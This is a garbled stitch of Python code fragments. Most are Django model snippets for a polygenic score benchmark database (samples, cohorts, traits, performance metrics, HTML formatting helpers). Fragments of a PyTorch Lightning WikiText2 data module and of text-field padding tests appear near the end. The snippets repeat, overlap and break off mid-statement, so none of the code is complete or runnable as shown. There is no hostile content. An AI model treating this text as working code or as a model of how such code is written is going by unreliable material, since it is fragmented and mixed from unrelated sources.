related_name='coding_trait') def 
__str__(self): return '%s", "return l def range_type_desc(self): desc_list = { 'ci': 'Confidence interval', 'iqr': 'Interquartile range'", "!= None: l['unit'] = self.unit return l def range_type_desc(self): desc_list = { 'ci':", "import settings from django.core.validators import MaxValueValidator, MinValueValidator from django.contrib.postgres.fields import DecimalRangeField class BM_Coding(models.Model):", "models.FloatField(verbose_name='Estimate', null=False) unit = models.TextField(verbose_name='Units of the effect size', max_length=100, blank = False)", "len(categories) > 0: # return [x.label for x in categories] # else: #", "from django.core.validators import MaxValueValidator, MinValueValidator from django.contrib.postgres.fields import DecimalRangeField class BM_Coding(models.Model): \"\"\"Class to", "#def mapped_terms_list(self): # if self.mapped_terms: # return self.mapped_terms.split(' | ') # else: #", "BM_Coding(models.Model): \"\"\"Class to describe the International Classification of Diseases used in PGS \"\"\"", "if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['cohorts'] @property def ancestries_list(self): if not hasattr(self,", "0: # return [x.label for x in categories] # else: # return []", "in self.class_acc_list: class_acc_data.append({'labels': class_acc[0], 'value': class_acc[1]}) perf_metrics['class_acc'] = class_acc_data othermetrics_list = self.othermetrics_list othermetrics_data", "on_delete=models.PROTECT, verbose_name='PGS Sample', related_name='sample_performance') # Samples used for evaluation efotrait = models.ForeignKey(BM_EFOTrait, on_delete=models.PROTECT,", "in self.phenotype_structured.all(): data.append('<b>'+phenotype.id+'</b>: '+phenotype.label) return data def get_bm_data(self): self.bm_data = {} data_types =", "href=\"../../benchmark/%s\">%s</a>'%(self.id, self.label) #@property #def display_id_url(self): # return '<a href=\"%s\">%s</a><span class=\"only_export\">: %s</span>'%(self.url, self.id, 
self.url)", "# v_spacing = ' class=\"mt-1\"' if len(category_labels) > 0 else '' # category_labels.append('<div{}><span", "percent_cases) if self.sample_controls != None: sstring += '<li><span class=\"only_export\">, </span>' sstring += '{:,}", "'%(self.id, self.label) @property def display_label(self): return '<a href=\"../../benchmark/%s\">%s</a>'%(self.id, self.label) #@property #def display_id_url(self): #", "(values)', null=True) range_type = models.CharField(verbose_name='Range (type)', max_length=100, default='range') # e.g. Confidence interval (ci),", "bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # cohorts.add(bm_performance.cohort.id) #return len(list(cohorts)) @property def count_samples(self): if not hasattr(self,", "+= '<span class=\"only_export\">[</span>' sstring += '<ul>\\n<li>{:,} cases{}</li>\\n'.format(self.sample_cases, percent_cases) if self.sample_controls != None: sstring", "self.get_bm_data() #scores = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # scores.add(bm_performance.score_id) return len(self.bm_data['scores']) @property", "models.CharField(verbose_name='Range (type)', max_length=100, default='se') # e.g. standard deviation (sd), standard error (se) def", "= set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # scores.add(bm_performance.score_id) return len(self.bm_data['scores']) @property def count_cohorts(self):", "!= None: return '{}:{}'.format(self.range_type, str(self.range)) return None def format_variability(self): if self.variability != None:", "ID', max_length=30, primary_key=True) label = models.CharField('Code Label', max_length=500, db_index=True) type = models.CharField('Code Type',", "Ancestry Category', max_length=100) ancestry_free = models.TextField('Ancestry (e.g. 
French, Chinese)', null=True) ancestry_country = models.TextField('Country", "related_name=\"performance_metric\") TYPE_CHOICES = [ ('ES', 'Effect Size'), ('CM', 'Classification Metric'), ('OM', 'Other Metric')", "sstring += '<span class=\"only_export\">[</span>' sstring += '<ul>\\n<li>{:,} cases{}</li>\\n'.format(self.sample_cases, percent_cases) if self.sample_controls != None:", "'value': effect_size[1]}) perf_metrics['effect_sizes'] = effect_sizes_data class_acc_list = self.class_acc_list class_acc_data = [] if class_acc_list:", "'' if self.sample_cases != None: percent_cases = '' if show_percent_cases: percent_cases = f'", "range' } if self.range_type.lower() in desc_list: return desc_list[self.range_type.lower()] def variability_type_desc(self): desc_list = {", "@property def display_ancestry_inline(self): if self.ancestry_free in ['NR', '', None]: return self.ancestry_broad else: return", "@property def count_scores(self): if not hasattr(self, 'bm_data'): self.get_bm_data() #scores = set() #for bm_performance", "self.name_short class BM_EFOTrait(models.Model): \"\"\"Abstract class to hold information related to controlled trait vocabulary", "objects score_id = models.CharField('Polygenic Score (PGS) ID', max_length=30, db_index=True) sample = models.ForeignKey(BM_Sample, on_delete=models.PROTECT,", "m in metrics: if (m.type == metric_type): l.append((m.name_tuple(), m.display_value())) if len(l) != 0:", "data['scores'].add(bm_performance.score_id) data['cohorts'].add(bm_performance.cohort) data['samples'].add(bm_performance.sample.id) data['ancestries'].add(bm_performance.sample.ancestry_broad) for type in data_types: #print(type+\": \"+str(list(data_count[type]))) self.bm_data[type] = list(data[type])", "in categories: # v_spacing = ' class=\"mt-1\"' if len(category_labels) > 0 else ''", "= models.TextField('Additional Ancestry Description', null=True) ## Cohorts/Sources #source_GWAS_catalog = models.CharField('GWAS Catalog Study ID", "extract and format 
the diverse metric data\"\"\" # Using all and filter afterward", "Metric') @property def performance_metrics(self): perf_metrics = {} effect_sizes_list = self.effect_sizes_list effect_sizes_data = []", "standard error (se) def format_estimate(self): if self.estimate != None: return '{}:{}'.format(self.estimate_type, self.estimate) return", "= DecimalRangeField(verbose_name='Range (values)', null=True) range_type = models.CharField(verbose_name='Range (type)', max_length=100, default='range') # e.g. Confidence", "#def synonyms_list(self): # if self.synonyms: # return self.synonyms.split(' | ') # else: #", "def display_samples_for_table(self, show_percent_cases=False): div_id = \"sample_\"+str(self.pk) sstring = '' if self.sample_cases != None:", "to extract and format the diverse metric data\"\"\" # Using all and filter", "return '%s (%s): %s'%(self.name, self.name_short, s) else: return '%s: %s'%(self.name, s) def display_value(self):", "class=\"mt-1\"' if len(category_labels) > 0 else '' # category_labels.append('<div{}><span class=\"trait_colour\" style=\"background-color:{}\"></span>{}</div>'.format(v_spacing,category.colour,category.label)) # categories_data", "s) else: return '%s: %s'%(self.name, s) def display_value(self): if self.ci != None: s", "', '.join(category_labels) # return categories_data #@property #def display_category_labels(self): # categories = self.category_list #", "\"Odds Ratio\" name_short = models.CharField(verbose_name='Performance Metric Name (Short)', max_length=25, null=True) # ex: \"OR\"", "#@property #def synonyms_list(self): # if self.synonyms: # return self.synonyms.split(' | ') # else:", "Name', max_length=100, db_index=True) name_full = models.CharField('Cohort Full Name', max_length=1000) def __str__(self): return self.name_short", "round(percent,2) else: return None def display_samples_for_table(self, show_percent_cases=False): div_id = \"sample_\"+str(self.pk) sstring = ''", "in ['NR', '', None]: return self.ancestry_broad 
else: return '{} ({})'.format(self.ancestry_broad, self.ancestry_free) class BM_Performance(models.Model):", "!= 0: return l return None class BM_Metric(models.Model): \"\"\"Class to hold metric type,", "href=\"%s\">%s</a><span class=\"only_export\">: %s</span>'%(self.url, self.id, self.url) @property def display_phenotype_structured(self): data = [] phenotype_structured =", "#print(type+\": \"+str(list(data_count[type]))) self.bm_data[type] = list(data[type]) @property def count_scores(self): if not hasattr(self, 'bm_data'): self.get_bm_data()", "BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # cohorts.add(bm_performance.cohort.id) #return len(list(cohorts)) @property def count_samples(self): if not hasattr(self, 'bm_data'): self.get_bm_data()", "return '{}:{}'.format(self.variability_type, self.variability) return None def format_unit(self): if self.unit != None: return '{}:{}'.format('unit',", "l return None class BM_Metric(models.Model): \"\"\"Class to hold metric type, name, value and", "self.class_acc_list: class_acc_data.append({'labels': class_acc[0], 'value': class_acc[1]}) perf_metrics['class_acc'] = class_acc_data othermetrics_list = self.othermetrics_list othermetrics_data =", "django.core.validators import MaxValueValidator, MinValueValidator from django.contrib.postgres.fields import DecimalRangeField class BM_Coding(models.Model): \"\"\"Class to describe", "(sd), standard error (se) def format_estimate(self): if self.estimate != None: return '{}:{}'.format(self.estimate_type, self.estimate)", "def cohorts_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['cohorts'] @property def ancestries_list(self): if", "models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_performance') def __str__(self): return '%s | %s | %s'%(self.efotrait.id, self.score_id,", "+= '{:,} controls</li>'.format(self.sample_controls) sstring += '</ul>' sstring += '<span 
class=\"only_export\">]</span>' sstring += '</div>'", "hold information related to controlled trait vocabulary (mainly to link multiple EFO to", "efotrait = models.ForeignKey(BM_EFOTrait, on_delete=models.PROTECT, verbose_name='EFO Trait', related_name=\"efotrait_performance\") cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_performance')", "null=True) # ex: \"OR\" estimate = models.FloatField(verbose_name='Estimate', null=False) unit = models.TextField(verbose_name='Units of the", "self.cohort.name_short) class Meta: get_latest_by = 'num' @property def effect_sizes_list(self): return self.get_metric_data('Effect Size') @property", "= no_helptip.format(self.variability_type.title(), self.variability, self.unit) if v != None: l.append(v) # Range r =", "return '<ul><li>'+'</li><li>'.join(l)+'</li></ul>' else: return '' def display_values_dict(self): l = {} # Estimate estimate", "interval', 'iqr': 'Interquartile range' } if self.range_type.lower() in desc_list: return desc_list[self.range_type.lower()] def variability_type_desc(self):", "{}'.format(self.unit) if len(e) > 0: l.append(e) # Variability v = None if self.variability", "# return [] #@property #def category_list(self): # return sorted(self.traitcategory.all(), key=lambda y: y.label) #@property", "cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_sample') #cohorts_additional = models.TextField('Additional Sample/Cohort Information', null=True) def", "category_labels = [] # for category in categories: # v_spacing = ' class=\"mt-1\"'", "'%s: %s'%(self.name, s) def display_value(self): if self.ci != None: s = '{} {}'.format(self.estimate,", "'Both'), ('Male', 'Male'), ('Female', 'Female') ] sample_sex = models.CharField(max_length=6, choices=SAMPLE_SEX_CHOICES, default='Both', verbose_name='Sample Sex'", "models.TextField(verbose_name='Units of the effect size', max_length=100, blank = False) ci 
= DecimalRangeField(verbose_name='95% Confidence", "models.CharField(max_length=6, choices=SAMPLE_SEX_CHOICES, default='Both', verbose_name='Sample Sex' ) sample_age = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='ages_of', null=True) ## Description", "desc_list = { 'ci': 'Confidence interval', 'iqr': 'Interquartile range' } if self.range_type.lower() in", "if self.unit != None: return '{}:{}'.format('unit', self.unit) return None def display_value(self): l =", "= set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): for bm_performance in self.efotrait_performance.all(): #print(str(bm_performance)) data['scores'].add(bm_performance.score_id) data['cohorts'].add(bm_performance.cohort)", "ancestries_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['ancestries'] #@property #def synonyms_list(self): # if", "set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # scores.add(bm_performance.score_id) return len(self.bm_data['scores']) @property def count_cohorts(self): if", "verbose_name='Sample Sex' ) sample_age = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='ages_of', null=True) ## Description phenotyping_free = models.TextField('Detailed", "# cohorts.add(bm_performance.cohort.id) #return len(list(cohorts)) @property def count_samples(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return", "if self.variability != None: type_desc = self.variability_type_desc() if (type_desc): v = helptip.format(type_desc, self.variability_type.title(),", "null=False, default='years') # e.g. 
[years, months, days] range = DecimalRangeField(verbose_name='Range (values)', null=True) range_type", "Numbers sample_number = models.IntegerField('Number of Individuals', validators=[MinValueValidator(1)]) sample_cases = models.IntegerField('Number of Cases', null=True)", "DecimalRangeField class BM_Coding(models.Model): \"\"\"Class to describe the International Classification of Diseases used in", "+= ' {}'.format(str(self.range)) e += ' {}'.format(self.unit) if len(e) > 0: l.append(e) #", "!= None: l[self.variability_type] = self.variability # Unit if self.unit != None: l['unit'] =", "Name (Short)', max_length=25, null=True) # ex: \"OR\" estimate = models.FloatField(verbose_name='Estimate', null=False) unit =", "l.append(r) if (len(l) == 1): return l[0] elif (len(l) > 1): return '<ul><li>'+'</li><li>'.join(l)+'</li></ul>'", "# if len(categories) > 0: # category_labels = [] # for category in", "# category_labels.append('<div{}><span class=\"trait_colour\" style=\"background-color:{}\"></span>{}</div>'.format(v_spacing,category.colour,category.label)) # categories_data = ''.join(category_labels) # return categories_data class BM_Demographic(models.Model):", "== metric_type): l.append((m.name_tuple(), m.display_value())) if len(l) != 0: return l return None class", "'value': othermetrics[1]}) perf_metrics['othermetrics'] = othermetrics_data return perf_metrics def get_metric_data(self, metric_type): \"\"\" Generic method", "r = None if '[' not in e: if self.range != None: type_desc", "= models.FloatField(verbose_name='Estimate (value)', null=True) estimate_type = models.CharField(verbose_name='Estimate (type)', max_length=100, null=True, default='mean') #e.g. 
[mean,", "= models.CharField('Ontology Trait Label', max_length=500, db_index=True) description = models.TextField('Ontology Trait Description', null=True) #url", "# Estimate estimate = '' if self.estimate != None: estimate = str(self.estimate) if", "\"\"\"Class to describe the International Classification of Diseases used in PGS \"\"\" id", "Metric'), ('OM', 'Other Metric') ] type = models.CharField(max_length=40, choices=TYPE_CHOICES, default='Other Metric', db_index=True )", "@property def class_acc_list(self): return self.get_metric_data('Classification Metric') @property def othermetrics_list(self): return self.get_metric_data('Other Metric') @property", "= models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='ages_of', null=True) ## Description phenotyping_free = models.TextField('Detailed Phenotype Description', null=True) phenotype_structured", "MaxValueValidator, MinValueValidator from django.contrib.postgres.fields import DecimalRangeField class BM_Coding(models.Model): \"\"\"Class to describe the International", "class BM_EFOTrait(models.Model): \"\"\"Abstract class to hold information related to controlled trait vocabulary (mainly", "'<span class=\"only_export\">[</span>' sstring += '<ul>\\n<li>{:,} cases{}</li>\\n'.format(self.sample_cases, percent_cases) if self.sample_controls != None: sstring +=", "related to controlled trait vocabulary (mainly to link multiple EFO to a single", "[] helptip = '<span title=\"{}\" class=\"pgs_helptip\">{}</span> : {} {}' no_helptip = '{} :", "if self.variability != None: return '{}:{}'.format(self.variability_type, self.variability) return None def format_unit(self): if self.unit", "point estimates or distributions\"\"\" estimate = models.FloatField(verbose_name='Estimate (value)', null=True) estimate_type = models.CharField(verbose_name='Estimate (type)',", "return None def format_variability(self): if self.variability != None: return '{}:{}'.format(self.variability_type, self.variability) 
return None", "= class_acc_data othermetrics_list = self.othermetrics_list othermetrics_data = [] if othermetrics_list: for othermetrics in", "format the diverse metric data\"\"\" # Using all and filter afterward uses less", "# Links to related objects score_id = models.CharField('Polygenic Score (PGS) ID', max_length=30, db_index=True)", "return None def display_value(self): l = [] helptip = '<span title=\"{}\" class=\"pgs_helptip\">{}</span> :", "= models.TextField('Synonyms', null=True) #mapped_terms = models.TextField('Mapped terms', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_trait')", "max_length=100, null=False) # ex: \"Odds Ratio\" name_short = models.CharField(verbose_name='Performance Metric Name (Short)', max_length=25,", "range, interquartile range (iqr), open range variability = models.FloatField(verbose_name='Variability (value)', null=True) variability_type =", "= models.CharField(max_length=40, choices=TYPE_CHOICES, default='Other Metric', db_index=True ) name = models.CharField(verbose_name='Performance Metric Name', max_length=100,", "related objects score_id = models.CharField('Polygenic Score (PGS) ID', max_length=30, db_index=True) sample = models.ForeignKey(BM_Sample,", "None def format_unit(self): if self.unit != None: return '{}:{}'.format('unit', self.unit) return None def", "{}' # Estimate e = '' if self.estimate != None: e += '{}", "show/hide the details\">{:,} individuals <i class=\"fa fa-plus-circle\"></i></a></div>'.format(self.sample_number) sstring += '<div class=\"toggle_list\" id=\"list_'+div_id+'\">' sstring", "models.FloatField(verbose_name='Estimate (value)', null=True) estimate_type = models.CharField(verbose_name='Estimate (type)', max_length=100, null=True, default='mean') #e.g. 
[mean, median]", "to describe cohorts used in samples\"\"\" name_short = models.CharField('Cohort Short Name', max_length=100, db_index=True)", "Type', max_length=10) class BM_Cohort(models.Model): \"\"\"Class to describe cohorts used in samples\"\"\" name_short =", "e += '{} : {}'.format(self.estimate_type.title(), self.estimate) if self.range != None and self.range_type.lower() ==", "BM_Demographic(models.Model): \"\"\"Class to describe Sample fields (sample_age, followup_time) that can be point estimates", "else: v = no_helptip.format(self.variability_type.title(), self.variability, self.unit) if v != None: l.append(v) # Range", "of Recruitment', null=True) ancestry_additional = models.TextField('Additional Ancestry Description', null=True) ## Cohorts/Sources #source_GWAS_catalog =", "return round(percent,2) else: return None def display_samples_for_table(self, show_percent_cases=False): div_id = \"sample_\"+str(self.pk) sstring =", "0 else '' # category_labels.append('<div{}><span class=\"trait_colour\" style=\"background-color:{}\"></span>{}</div>'.format(v_spacing,category.colour,category.label)) # categories_data = ''.join(category_labels) # return" ]
[ "train_dataloader(self): return DataLoader( dataset=self.train_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def val_dataloader(self): return DataLoader( dataset=self.valid_dataset,", "dataset=self.valid_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def test_dataloader(self): return DataLoader( dataset=self.test_dataset, batch_size=self.batch_size, shuffle=False, num_workers=self.num_workers,", "stage is None: self.train_dataset = WikiText2(split='train') self.valid_dataset = WikiText2(split='valid') # Assign test dataset", "stage is None: self.test_dataset = WikiText2(split='test') def train_dataloader(self): return DataLoader( dataset=self.train_dataset, batch_size=self.batch_size, shuffle=True,", "batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def test_dataloader(self): return DataLoader( dataset=self.test_dataset, batch_size=self.batch_size, shuffle=False, num_workers=self.num_workers, )", "def train_dataloader(self): return DataLoader( dataset=self.train_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def val_dataloader(self): return DataLoader(", "== \"fit\" or stage is None: self.train_dataset = WikiText2(split='train') self.valid_dataset = WikiText2(split='valid') #", "val_dataloader(self): return DataLoader( dataset=self.valid_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def test_dataloader(self): return DataLoader( dataset=self.test_dataset,", "# PIP from torch.utils.data import DataLoader from pytorch_lightning import LightningDataModule from torchtext.datasets import", "LightningDataModule from torchtext.datasets import WikiText2 # Custom class CustomDataModule(LightningDataModule): def __init__( self, batch_size=1,", "shuffle=True, num_workers=self.num_workers, ) def val_dataloader(self): return DataLoader( dataset=self.valid_dataset, batch_size=self.batch_size, shuffle=True, 
num_workers=self.num_workers, ) def", "is None: self.test_dataset = WikiText2(split='test') def train_dataloader(self): return DataLoader( dataset=self.train_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers,", "stage == \"fit\" or stage is None: self.train_dataset = WikiText2(split='train') self.valid_dataset = WikiText2(split='valid')", "self.train_dataset = WikiText2(split='train') self.valid_dataset = WikiText2(split='valid') # Assign test dataset if stage ==", "Standard # PIP from torch.utils.data import DataLoader from pytorch_lightning import LightningDataModule from torchtext.datasets", "self, batch_size=1, num_workers=0, ): super().__init__() self.batch_size = batch_size self.num_workers = num_workers def setup(", "batch_size self.num_workers = num_workers def setup( self, stage=None, ): # Assign train &", "\"test\" or stage is None: self.test_dataset = WikiText2(split='test') def train_dataloader(self): return DataLoader( dataset=self.train_dataset,", "val datasets if stage == \"fit\" or stage is None: self.train_dataset = WikiText2(split='train')", "num_workers def setup( self, stage=None, ): # Assign train & val datasets if", "import DataLoader from pytorch_lightning import LightningDataModule from torchtext.datasets import WikiText2 # Custom class", "PIP from torch.utils.data import DataLoader from pytorch_lightning import LightningDataModule from torchtext.datasets import WikiText2", "self, stage=None, ): # Assign train & val datasets if stage == \"fit\"", ") def val_dataloader(self): return DataLoader( dataset=self.valid_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def test_dataloader(self): return", "Assign test dataset if stage == \"test\" or stage is None: self.test_dataset =", "or stage is None: self.test_dataset = WikiText2(split='test') def train_dataloader(self): return DataLoader( dataset=self.train_dataset, batch_size=self.batch_size,", "def __init__( self, batch_size=1, 
num_workers=0, ): super().__init__() self.batch_size = batch_size self.num_workers = num_workers", "None: self.train_dataset = WikiText2(split='train') self.valid_dataset = WikiText2(split='valid') # Assign test dataset if stage", "# Custom class CustomDataModule(LightningDataModule): def __init__( self, batch_size=1, num_workers=0, ): super().__init__() self.batch_size =", "self.test_dataset = WikiText2(split='test') def train_dataloader(self): return DataLoader( dataset=self.train_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def", "): # Assign train & val datasets if stage == \"fit\" or stage", "WikiText2(split='train') self.valid_dataset = WikiText2(split='valid') # Assign test dataset if stage == \"test\" or", "pytorch_lightning import LightningDataModule from torchtext.datasets import WikiText2 # Custom class CustomDataModule(LightningDataModule): def __init__(", "= WikiText2(split='valid') # Assign test dataset if stage == \"test\" or stage is", "Custom class CustomDataModule(LightningDataModule): def __init__( self, batch_size=1, num_workers=0, ): super().__init__() self.batch_size = batch_size", "self.valid_dataset = WikiText2(split='valid') # Assign test dataset if stage == \"test\" or stage", "from torch.utils.data import DataLoader from pytorch_lightning import LightningDataModule from torchtext.datasets import WikiText2 #", "# Standard # PIP from torch.utils.data import DataLoader from pytorch_lightning import LightningDataModule from", "is None: self.train_dataset = WikiText2(split='train') self.valid_dataset = WikiText2(split='valid') # Assign test dataset if", "num_workers=self.num_workers, ) def val_dataloader(self): return DataLoader( dataset=self.valid_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def test_dataloader(self):", "DataLoader( dataset=self.train_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def val_dataloader(self): return 
DataLoader( dataset=self.valid_dataset, batch_size=self.batch_size, shuffle=True,", "if stage == \"fit\" or stage is None: self.train_dataset = WikiText2(split='train') self.valid_dataset =", "== \"test\" or stage is None: self.test_dataset = WikiText2(split='test') def train_dataloader(self): return DataLoader(", "stage == \"test\" or stage is None: self.test_dataset = WikiText2(split='test') def train_dataloader(self): return", "WikiText2 # Custom class CustomDataModule(LightningDataModule): def __init__( self, batch_size=1, num_workers=0, ): super().__init__() self.batch_size", "datasets if stage == \"fit\" or stage is None: self.train_dataset = WikiText2(split='train') self.valid_dataset", "train & val datasets if stage == \"fit\" or stage is None: self.train_dataset", "\"fit\" or stage is None: self.train_dataset = WikiText2(split='train') self.valid_dataset = WikiText2(split='valid') # Assign", "class CustomDataModule(LightningDataModule): def __init__( self, batch_size=1, num_workers=0, ): super().__init__() self.batch_size = batch_size self.num_workers", "# Assign train & val datasets if stage == \"fit\" or stage is", "torchtext.datasets import WikiText2 # Custom class CustomDataModule(LightningDataModule): def __init__( self, batch_size=1, num_workers=0, ):", "batch_size=1, num_workers=0, ): super().__init__() self.batch_size = batch_size self.num_workers = num_workers def setup( self,", "import WikiText2 # Custom class CustomDataModule(LightningDataModule): def __init__( self, batch_size=1, num_workers=0, ): super().__init__()", "import LightningDataModule from torchtext.datasets import WikiText2 # Custom class CustomDataModule(LightningDataModule): def __init__( self,", "__init__( self, batch_size=1, num_workers=0, ): super().__init__() self.batch_size = batch_size self.num_workers = num_workers def", "DataLoader( dataset=self.valid_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def test_dataloader(self): return 
DataLoader( dataset=self.test_dataset, batch_size=self.batch_size, shuffle=False,", "stage=None, ): # Assign train & val datasets if stage == \"fit\" or", "def setup( self, stage=None, ): # Assign train & val datasets if stage", "return DataLoader( dataset=self.valid_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def test_dataloader(self): return DataLoader( dataset=self.test_dataset, batch_size=self.batch_size,", "= num_workers def setup( self, stage=None, ): # Assign train & val datasets", "self.batch_size = batch_size self.num_workers = num_workers def setup( self, stage=None, ): # Assign", "setup( self, stage=None, ): # Assign train & val datasets if stage ==", "batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def val_dataloader(self): return DataLoader( dataset=self.valid_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, )", "= batch_size self.num_workers = num_workers def setup( self, stage=None, ): # Assign train", "None: self.test_dataset = WikiText2(split='test') def train_dataloader(self): return DataLoader( dataset=self.train_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, )", "dataset=self.train_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def val_dataloader(self): return DataLoader( dataset=self.valid_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers,", "return DataLoader( dataset=self.train_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def val_dataloader(self): return DataLoader( dataset=self.valid_dataset, batch_size=self.batch_size,", "WikiText2(split='valid') # Assign test dataset if stage == \"test\" or stage is None:", "test dataset if stage == \"test\" or stage is None: self.test_dataset = WikiText2(split='test')", "WikiText2(split='test') def train_dataloader(self): return DataLoader( dataset=self.train_dataset, 
batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def val_dataloader(self): return", "from torchtext.datasets import WikiText2 # Custom class CustomDataModule(LightningDataModule): def __init__( self, batch_size=1, num_workers=0,", "num_workers=0, ): super().__init__() self.batch_size = batch_size self.num_workers = num_workers def setup( self, stage=None,", "self.num_workers = num_workers def setup( self, stage=None, ): # Assign train & val", "def val_dataloader(self): return DataLoader( dataset=self.valid_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def test_dataloader(self): return DataLoader(", "# Assign test dataset if stage == \"test\" or stage is None: self.test_dataset", "= WikiText2(split='test') def train_dataloader(self): return DataLoader( dataset=self.train_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, ) def val_dataloader(self):", "DataLoader from pytorch_lightning import LightningDataModule from torchtext.datasets import WikiText2 # Custom class CustomDataModule(LightningDataModule):", "& val datasets if stage == \"fit\" or stage is None: self.train_dataset =", "dataset if stage == \"test\" or stage is None: self.test_dataset = WikiText2(split='test') def", "super().__init__() self.batch_size = batch_size self.num_workers = num_workers def setup( self, stage=None, ): #", "or stage is None: self.train_dataset = WikiText2(split='train') self.valid_dataset = WikiText2(split='valid') # Assign test", "CustomDataModule(LightningDataModule): def __init__( self, batch_size=1, num_workers=0, ): super().__init__() self.batch_size = batch_size self.num_workers =", "if stage == \"test\" or stage is None: self.test_dataset = WikiText2(split='test') def train_dataloader(self):", "torch.utils.data import DataLoader from pytorch_lightning import LightningDataModule from torchtext.datasets import WikiText2 # Custom", "): super().__init__() self.batch_size = batch_size 
self.num_workers = num_workers def setup( self, stage=None, ):", "from pytorch_lightning import LightningDataModule from torchtext.datasets import WikiText2 # Custom class CustomDataModule(LightningDataModule): def", "= WikiText2(split='train') self.valid_dataset = WikiText2(split='valid') # Assign test dataset if stage == \"test\"", "Assign train & val datasets if stage == \"fit\" or stage is None:" ]
[ "init_token is properly handled. field = data.TextField(fix_length=4, init_token=\"<bos>\") minibatch = [[\"a\", \"sentence\", \"of\",", "== expected_output assert field.decode(np.asarray(word_idxs)) == expected_output # Single caption word_idxs = [0, 3,", "# Test init_token is properly handled. field = data.TextField(fix_length=4, init_token=\"<bos>\") minibatch = [[\"a\",", "caption word_idxs = [0, 3, 2, 1] expected_output = 'a c' test_all_dtypes(word_idxs, expected_output)", "[[]] expected_output = ['', ] assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output", "= MyVocab(field.eos_token) # Empty captions (not tested for PyTorch tensors) word_idxs = []", "2, 1], [3, 3, 2, 1], [2, 1, 1, 1]] expected_output = ['a", "= [3, 2, 3] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=3, include_lengths=True) assert", "\"last\", \"sent\"]] expected_lengths = [4, 3, 4] assert field.pad(minibatch) == expected_padded_minibatch field =", "\"data\", \".\"], [\"yet\", \"another\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"one\", \"last\", \"sent\", \"<pad>\", \"<pad>\"]] expected_lengths", "(expected_padded_minibatch, expected_lengths) field = data.TextField(fix_length=3, truncate_first=True) expected_padded_minibatch = [[\"of\", \"data\", \".\"], [\"yet\", \"another\",", "assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output # Single caption word_idxs =", "== expected_output # Single caption word_idxs = [0, 3, 2, 1] expected_output =", "c' test_all_dtypes(word_idxs, expected_output) # Batch of captions word_idxs = [[0, 3, 2, 1],", "3] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths)", "== expected_output assert field.decode(np.asarray(word_idxs)) == expected_output assert 
field.decode(torch.from_numpy(np.asarray(word_idxs))) == expected_output class MyVocab(object): def", "def __init__(self, eos_token): self.itos = {0: 'a', 1: 'b', 2: eos_token, 3: 'c'}", "data import numpy as np import torch '''class TestImageField(object): def test_preprocessing(self): field =", "field = data.TextField(fix_length=4, init_token=\"<bos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"],", "expected_output = 'a c' test_all_dtypes(word_idxs, expected_output) # Batch of captions word_idxs = [[0,", "init_token and eos_token are properly handled. field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\") minibatch = [[\"a\",", "expected_lengths) # Test fix_length properly truncates and pads. field = data.TextField(fix_length=3) minibatch =", "test_pad(self): # Default case. field = data.TextField() minibatch = [[\"a\", \"sentence\", \"of\", \"data\",", "= data.TextField(fix_length=4, init_token=\"<bos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\",", "expected_output) # Batch of captions word_idxs = [[0, 3, 2, 1], [3, 3,", "\".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [ [\"<bos>\", \"a\", \"sentence\", \"of\",", 